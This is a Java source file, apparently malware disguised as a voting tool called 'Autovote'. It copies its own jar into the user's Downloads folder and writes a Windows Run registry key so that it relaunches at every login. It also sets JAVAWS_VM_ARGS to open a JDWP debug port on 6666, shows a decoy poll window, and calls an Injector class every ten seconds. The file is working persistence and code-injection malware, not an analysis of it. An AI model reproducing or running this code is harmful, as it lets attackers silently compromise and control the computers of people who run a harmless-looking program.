package autovote;

import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;

import autovote.jdpa.Injector;

public class Autovote {

	private static final boolean ENABLE_STEALTH = true;

	public static void main(String[] args) throws Exception {
		boolean stealth = args.length >= 1 && args[0].equals("stealth");
		if (!stealth) {
			String jarpath = Autovote.class.getProtectionDomain()
					.getCodeSource().getLocation().getPath();
			if (jarpath.startsWith("/"))
				jarpath = jarpath.substring(1);
			File jarfile = new File(jarpath);
			jarpath = jarfile.getAbsolutePath();
			copyFile(jarpath, System.getProperty("user.home")
					+ "\\Downloads\\autovote.jar");
		}
		addRegistryKey(
				"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
				"autovote",
				"REG_EXPAND_SZ",
				"\"javaw -Xrunjdwp:transport=dt_shmem,server=y -jar %homepath%\\Downloads\\autovote.jar "
						+ (ENABLE_STEALTH ? "stealth" : "") + "\"");
		addRegistryKey("HKCU\\Environment", "JAVAWS_VM_ARGS", "REG_SZ",
				"\"-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=6666\"");
		if (!stealth)
			javax.swing.SwingUtilities.invokeLater(new Runnable() {
				public void run() {
					new DummyPoll();
				}
			});
		while (true) {
			System.out.println(".");
			try {
				Thread.sleep(10000);
				new Injector().run();
			} catch (Exception e) {
			}
		}
	}

	public static void copyFile(String from, String to) throws Exception {
		System.out.println("Copy " + from + " -> " + to);
		FileInputStream fis = new FileInputStream(from);
		FileOutputStream fos = new FileOutputStream(to);
		try {
			byte[] buf = new byte[1024];
			int len = 0;
			while ((len = fis.read(buf)) != -1) {
				fos.write(buf, 0, len);
			}
		} catch (Exception e) {
			throw e;
		} finally {
			fis.close();
			fos.close();
		}
	}

	private static void addRegistryKey(String path, String key, String type,
			String value) {
		protectedExec(String.format("reg add %s /v %s /t %s /d %s /f", path,
				key, type, value));
	}

	private static void protectedExec(String cmd) {
		System.out.println(cmd);
		try {
			Runtime.getRuntime().exec(cmd);
		} catch (IOException e) {
			System.out.println("*** CMD FAIL: " + cmd + ": " + e);
		}
	}
}
